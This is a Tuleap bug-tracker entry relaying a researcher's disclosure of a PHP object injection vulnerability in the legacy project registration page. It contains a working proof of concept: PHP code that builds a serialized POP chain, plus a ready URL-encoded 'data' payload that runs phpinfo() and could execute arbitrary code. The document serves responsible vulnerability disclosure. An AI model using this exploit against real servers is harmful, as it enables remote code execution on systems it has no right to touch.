request #7601 Security issue with legacy project creation page and IM plugin

Artifact

Infos

Artifact ID#7601

Submitted byManuel Vacelet (vaceletm)

Last Modified On2014-11-28 10:42

Submitted on2014-11-05 11:36

Rank7600

Details

Summary *

Security issue with legacy project creation page and IM plugin

Original Submission

Original report:

I discovered a PHP Object Injection Vulnerability which affects the latest version of Tuleap (7.6-3) and probably older versions. Actually I spotted the vulnerability while auditing the source tree of version 7.6-2, and today I've tested and confirmed the vulnerability on a Tuleap virtual appliance downloaded from your website (TuleapAppliance.7.5.ova). This is the vulnerable line of code:

https://github.com/Enalean/tuleap/blob/master/src/www/project/register.php#L39

User input passed through the “data” request parameter is not properly sanitized before being used in a call to the “unserialize()” function. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow authenticated attackers to execute arbitrary PHP code via a specially crafted "POP chain", leveraging the Jabbex::__destruct() magic method:

<?php

class Chart {}

class Transition_PostAction_FieldFactory

{

protected $post_actions_classes = array('1;phpinfo();die;//');

}

class Jabber

{

function __construct()

{

$this->_use_log = 1;

$this->_connection = new Chart;

$this->_event_handlers['debug_log'] = array(new Transition_PostAction_FieldFactory, 'fetchPostActions');

}

}

class EventHandler

{

private $authenticated = true;

}

class Jabbex

{

private $handler, $jab;

function __construct()

{

$this->jab = new Jabber;

$this->handler = new EventHandler;

}

}

print rawurlencode(serialize(new Jabbex));

?>

The above PHP code will print a "data" parameter which will trigger the vulnerability. Thus an attacker just needs to login in Tuleap and visit the following URL in order to see a "phpinfo" page (note that arbitrary PHP code might be executed):

http://[host]/[tuleap]/project/register.php?data=O%3A6%3A%22Jabbex%22%3A2%3A%7Bs%3A15%3A%22%00Jabbex%00handler%22%3BO%3A12%3A%22EventHandler%22%3A1%3A%7Bs%3A27%3A%22%00EventHandler%00authenticated%22%3Bb%3A1%3B%7Ds%3A11%3A%22%00Jabbex%00jab%22%3BO%3A6%3A%22Jabber%22%3A3%3A%7Bs%3A8%3A%22_use_log%22%3Bi%3A1%3Bs%3A11%3A%22_connection%22%3BO%3A5%3A%22Chart%22%3A0%3A%7B%7Ds%3A15%3A%22_event_handlers%22%3Ba%3A1%3A%7Bs%3A9%3A%22debug_log%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A34%3A%22Transition_PostAction_FieldFactory%22%3A1%3A%7Bs%3A23%3A%22%00%2A%00post_actions_classes%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A18%3A%221%3Bphpinfo%28%29%3Bdie%3B%2F%2F%22%3B%7D%7Di%3A1%3Bs%3A16%3A%22fetchPostActions%22%3B%7D%7D%7D%7D

In order to successfully exploit this vulnerability, the 'sys_create_project_in_one_step' option must be disabled.

Kinds regards,

Egidio Romano